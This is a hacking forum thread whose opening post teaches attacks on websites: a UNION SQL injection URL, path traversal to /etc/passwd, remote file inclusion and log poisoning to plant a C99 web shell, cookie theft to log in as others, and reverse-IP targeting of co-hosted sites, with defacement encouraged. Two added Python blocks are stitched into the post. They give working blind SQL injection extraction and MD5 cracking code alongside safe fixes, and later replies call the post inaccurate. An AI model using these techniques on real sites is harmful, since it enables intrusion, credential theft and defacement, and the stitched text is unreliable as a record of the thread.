
Thread: Attacking Websites - Basic methodology Understanding - My123World.Com!

  1. #1

    Attacking Websites - Basic methodology Understanding

    This is probably going to be an ongoing tutorial because there are so many ways, but I'll just start it off.

    You can attack websites through multiple attack vectors:

    1. SQL
    2. RFI
    3. LFI
    4. XSS
    5. Cookie Manipulation Injection
    6. CSRF

    etc. etc.

    I'll go through each item on the list briefly.


    What is SQL?

    SQL Injection is nothing but executing SQL queries in a website's URL address params.

    For example:

    Code:
    www.site.com/index.php?param=-999999999 UNION SELECT * FROM table WHERE id=1

    How does that benefit you?

    By executing SQL queries in the params of a URL address you can pull database information, such as usernames and passwords.

    Let's say site 1 is vulnerable to a SQL injection attack. You pull the usernames and passwords from the database.

    What happens then?

    You either get plaintext or encrypted hash codes (MD5, MD4, SHA1, etc.).

    A site I like to use for decrypting MD5 passwords is:

    *Google md5decrypt, you will see the .net one* Click that one.

    I use that because it has never failed me.

    So let's say you want to inject a C99 shell: you would execute something about INFILE.

    Just Google that; I don't remember the full query.

    That query will allow you to inject a C99 shell. *Debatable*

    So now you have decrypted the username and password and you have logged into the administration page.

    Now you will search for some way to upload a C99 shell, etc. etc.

    Or be like everyone else and probably deface the site and move on.

    -------------------------------------------------------------------------------


    An RFI is a Remote File Inclusion (which still works, by the way, even though the Redhat company paid the developers of PHP over a million dollars to get it fixed, yet it still exists).

    With an RFI you can inject a C99 shell or what have you into the site, because of the _GET in the code.

    Example:

    http://www.site.com/index.php?param=...com/file.php??

    Oh, also, for the PHP injection you can sometimes execute PHP code in the params, like:

    param=<?php phpinfo(); ?>

    Moving back to RFI: after you have included the shell you can go about your business, upload a copy to the server and start doing your evil bidding.

    ------------------------------------------------------------------------

    LFI - Local File Inclusion Vulnerability

    With an LFI you can view files within the params of a URL, like so:

    http://www.site.com/index.php?param=../../../etc/passwd

    Here is one of my personal tips for an LFI:

    Check the history xD. Through that you might get lucky and get the password of the user ID you're executing that on, or if Apache is running under root you can even probably pull the password to root.

    You can also inject a C99 shell into the Apache log files through GET requests, etc. etc.

    ----------------------------------------------------------------------------------------------

    XSS -
    Honestly, an XSS attack is bullshit in the first place unless it's permanent.

    If it's permanent you can inject an XSS attack to pull the cookie data.

    Go to http://ha.ckers.org/xss.html, which will redirect you to OWASP.

    Or just Google "xss cheat sheet" and click the OWASP one.

    I hate XSS and I don't like talking about it.

    ---------------------------------------------------------------------------------------

    Cookie Injection

    Through cookie injections you can pull someone's cookies and log into the site as them, by using the Cookie addon for Firefox.

    If you have someone's cookies that have the encrypted password to their site, you can add that cookie to yours and voilà, you have now logged in.

    -----------------------------------------------------------------------------------------


    Obviously I didn't go into great detail about these multiple attack vectors, but you get an idea of where I'm coming from.

    So now what do you do?

    You've learned all the attack vectors and you browse to a site that just isn't vulnerable.

    Next, what you will do is a whois on the IP address, and then go to a site that does Reverse IP, which will show you all the websites on the server. You can then use multiple attack vectors on the sites hosted on the server, which will allow you possible access to the site.

    And by reading my other tutorial you can use that knowledge to figure out how to gain access to the site you're after.

    If you need any help or have further questions about this tutorial, just ask and I'll be glad to answer them.
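    The SQL injection section above (and the blind/timing-based injection the reply below says it should have covered) can be shown end to end without a target: the following is an added example, not code from the original post. It builds a throwaway SQLite `users` table (constructed rows, unsalted MD5 like many old CMSes), a `lookup_user_vulnerable()` that pastes the URL parameter into the query the way `index.php?param=` code does, and then runs the chain the post describes: UNION-based dump, boolean-based blind extraction when no output is echoed, an offline dictionary lookup on the recovered hash (what the "md5 decrypt" sites do), and finally the same lookup with a bound parameter, which the payload cannot touch. All names and data here are the example's own.

```python
"""SQL injection walk-through against an in-memory SQLite database.

Added example, not code from the original post. The users table, its rows and
the lookup_user_*() helpers are constructed here to stand in for the
"index.php?param=..." lookup the post describes.
"""
import hashlib
import sqlite3
from typing import Optional

ADMIN_HASH = hashlib.md5(b"letmein").hexdigest()   # unsalted, as in many old CMSes
BOB_HASH = hashlib.md5(b"hunter2").hexdigest()

# Constructed sample rows: (id, username, password_hash)
SAMPLE_USERS = [(1, "admin", ADMIN_HASH), (2, "bob", BOB_HASH)]


def make_db() -> sqlite3.Connection:
    """Build the toy database the rest of the example queries."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_user_vulnerable(conn, param: str):
    """Pastes the URL parameter straight into the SQL, PHP-style
    ("... WHERE id = $_GET['param']"). Whatever is in param is executed."""
    return conn.execute(f"SELECT id, username FROM users WHERE id = {param}").fetchall()


def lookup_user_safe(conn, param: str):
    """Same lookup with a bound parameter: the input is compared as a value
    and never parsed as SQL, so an injection payload simply matches nothing."""
    return conn.execute("SELECT id, username FROM users WHERE id = ?", (param,)).fetchall()


def union_dump(conn):
    """UNION-based extraction. The impossible id empties the real result set,
    so every row that comes back is made of attacker-chosen columns."""
    return lookup_user_vulnerable(conn, "-999999999 UNION SELECT username, password FROM users")


def blind_extract(conn, column: str, row_id: int, max_len: int = 32) -> str:
    """Boolean-based blind extraction for when the page echoes no query output,
    only whether a row was found: recover the value one character at a time.
    The hex alphabet suffices for an MD5 digest; widen it for other data."""
    alphabet = "0123456789abcdef"
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            probe = (f"{row_id} AND substr((SELECT {column} FROM users WHERE id = {row_id}), "
                     f"{pos}, 1) = '{ch}'")
            if lookup_user_vulnerable(conn, probe):   # a row came back: the guess was right
                recovered += ch
                break
        else:
            break                                     # no character matched: end of value
    return recovered


def crack_md5(digest: str, wordlist) -> Optional[str]:
    """Offline dictionary attack on an unsalted MD5: the same lookup the online
    "md5 decrypt" sites do, which is why such a dump is as good as plaintext."""
    for word in wordlist:
        if hashlib.md5(word.encode()).hexdigest() == digest:
            return word
    return None


def demo():
    """Run the whole chain: dump, blind-extract, crack, then the safe lookup."""
    conn = make_db()
    dumped = union_dump(conn)                    # [('admin', <hash>), ('bob', <hash>)]
    blind = blind_extract(conn, "password", 1)   # admin's hash from 512 yes/no probes
    cracked = crack_md5(blind, ["password", "123456", "letmein", "qwerty"])  # constructed wordlist
    safe = lookup_user_safe(conn, "-999999999 UNION SELECT username, password FROM users")  # []
    return dumped, blind, cracked, safe


if __name__ == "__main__":
    print(demo())
```

    The blind path is the one to notice: even with every error message and result hidden, a page that behaves differently for a true and a false condition leaks one bit per request, and SQLite has no sleep(), so a time-based variant would only swap the substr() probe for a delaying expression on MySQL or MSSQL. The fix is the last function, not input filtering: bind the parameter and the payload is just a string that matches no row.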

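    The LFI section above ("param=../../../etc/passwd") comes down to one missing check in the include code. The following is an added example, not code from the original post: it creates a temporary `pages/` directory with one real page and a stand-in secret file one level up, then resolves the same traversal payload through a resolver modelled on `include($dir . $_GET['param'])` and through one that allowlists the name and confirms the canonical path stays under the base directory. The directory layout, file contents and helper names are all constructed for the example; /etc/passwd itself is never read.

```python
"""Local file inclusion via path traversal, and a resolver that refuses it.

Added example, not code from the original post. The pages/ directory, the
stand-in secret file and the resolve_*() helpers are constructed here inside a
temporary directory so the script runs offline.
"""
import os
import re
import tempfile
from typing import Optional

SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]+\.txt$")   # constructed allowlist: plain page names only


def resolve_vulnerable(base_dir: str, param: str) -> str:
    """Mirrors include($dir . $_GET['param']): the parameter is glued onto the
    base directory and nothing checks that the result stays inside it, so
    ../ sequences (or an absolute path) walk out to any file the web user can read."""
    return os.path.normpath(os.path.join(base_dir, param))


def resolve_safe(base_dir: str, param: str) -> Optional[str]:
    """Two independent checks: the parameter must look like a plain page name,
    and the canonical path must still sit under base_dir. Either failing
    returns None (a real app would answer 404)."""
    if not SAFE_NAME.match(param):
        return None
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, param))
    if os.path.commonpath([base, target]) != base:
        return None
    return target


def demo():
    """Create pages/home.txt and a secret.txt outside pages/, then push the
    same traversal payload through both resolvers."""
    with tempfile.TemporaryDirectory() as root:
        pages = os.path.join(root, "pages")
        os.mkdir(pages)
        with open(os.path.join(pages, "home.txt"), "w") as f:
            f.write("welcome")
        with open(os.path.join(root, "secret.txt"), "w") as f:
            f.write("root:x:0:0:root:/root:/bin/bash")   # constructed stand-in for /etc/passwd
        payload = "../secret.txt"
        with open(resolve_vulnerable(pages, payload)) as f:
            leaked = f.read()                             # traversal succeeds
        blocked = resolve_safe(pages, payload)            # None: rejected
        with open(resolve_safe(pages, "home.txt")) as f:
            legit = f.read()                              # a normal request still works
        return leaked, blocked, legit


if __name__ == "__main__":
    print(demo())
```

    The allowlist is what also closes the tricks the post hints at: a null byte (`%00`, used on old PHP to cut off an appended extension), a wrapper scheme, or a path to the Apache access log fail the name check before any filesystem call is made. The realpath/commonpath check is kept as a second line of defence in case the allowlist is ever loosened.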
  2. #2
    This is not a methodology. A methodology would explain the steps from target selection to profiling to mapping to vulnerability scanning to exploitation. These are just randomly spewed out attack vectors.

    "SQL Injection is nothing But executing sql queries in a websites url address params" - really? That is not the definition of SQL injection now, is it? How about when it is parameter or cookie injection based? How about explaining blind injection, timing based etc.?

    "You've learned all attack vectors" - <sigh>

    Sorry to be a pain but if you can't be helpful then you are just the blind leading the blind.

  3. #3
    abhaythehero (Super Commando Dhruv)
    Quote Originally Posted by pete_the_ram:
    This is not a methodology. A methodology would explain the steps from target selection to profiling to mapping to vulnerability scanning to exploitation. These are just randomly spewed out attack vectors.

    "SQL Injection is nothing But executing sql queries in a websites url address params" - really? That is not the definition of SQL injection now, is it? How about when it is parameter or cookie injection based? How about explaining blind injection, timing based etc.?

    "You've learned all attack vectors" - <sigh>

    Sorry to be a pain but if you can't be helpful then you are just the blind leading the blind.
    Would you be kind enough to extrapolate your observations and enlighten us truly as to what you would have posted in place of the topic starter, unhappy as you are with the topic starter?
    In the world of 0s and 1s, are you a zero or The One!

  4. #4
    I merely think that if a user states they are going to share an attack methodology then the post should be a methodology - surely that is a fair enough request.

    My example of the SQL injection section was again just to say that the information presented was not very factual or helpful. I was merely trying to ensure newcomers do not read this and take it for the truth.

  5. #5
    @Mods, please close these kinds of threads. With due respect to the topic creator, sorry bro, this is simply wasting each other's time.
    "In order to change the world all you need to do is Tweak the Source Code"

    Things to do : Make a Difference (M.A.D)
